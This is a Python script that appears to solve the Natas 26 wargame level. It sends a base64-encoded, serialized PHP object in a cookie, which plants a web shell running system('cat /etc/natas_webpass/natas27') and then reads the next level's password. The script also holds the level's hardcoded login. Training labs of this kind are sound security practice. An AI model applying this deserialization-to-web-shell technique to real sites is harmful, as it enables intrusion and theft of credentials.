# Import Library
import requests
import re

# Setting variables needed
username = 'natas26'
password = 'oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T'

url=f'http://{username}.natas.labs.overthewire.org/'
pw = []

# Connect to natas
session = requests.session()
response = session.get(url, auth=(username,password))

#The Cookie of 'drawing' is generated by the file 'natas26_tool.php'
session.cookies['drawing'] = "Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoyNToiaW1nL3RoaXNpc3RoZXBhc3N3b3JkLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjI1OiJIZWxsbyBQYXNzd29yZCBvZiBOYXRhczI3IjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NTA6Ijw/cGhwIHN5c3RlbSgnY2F0IC9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jyk7ID8+Ijt9"
response = session.get(url + '?x1=43&y1=65&x2=33&y2=76', auth=(username,password))

response = session.get(url + 'img/thisisthepassword.php', auth=(username,password))
print(response.text)
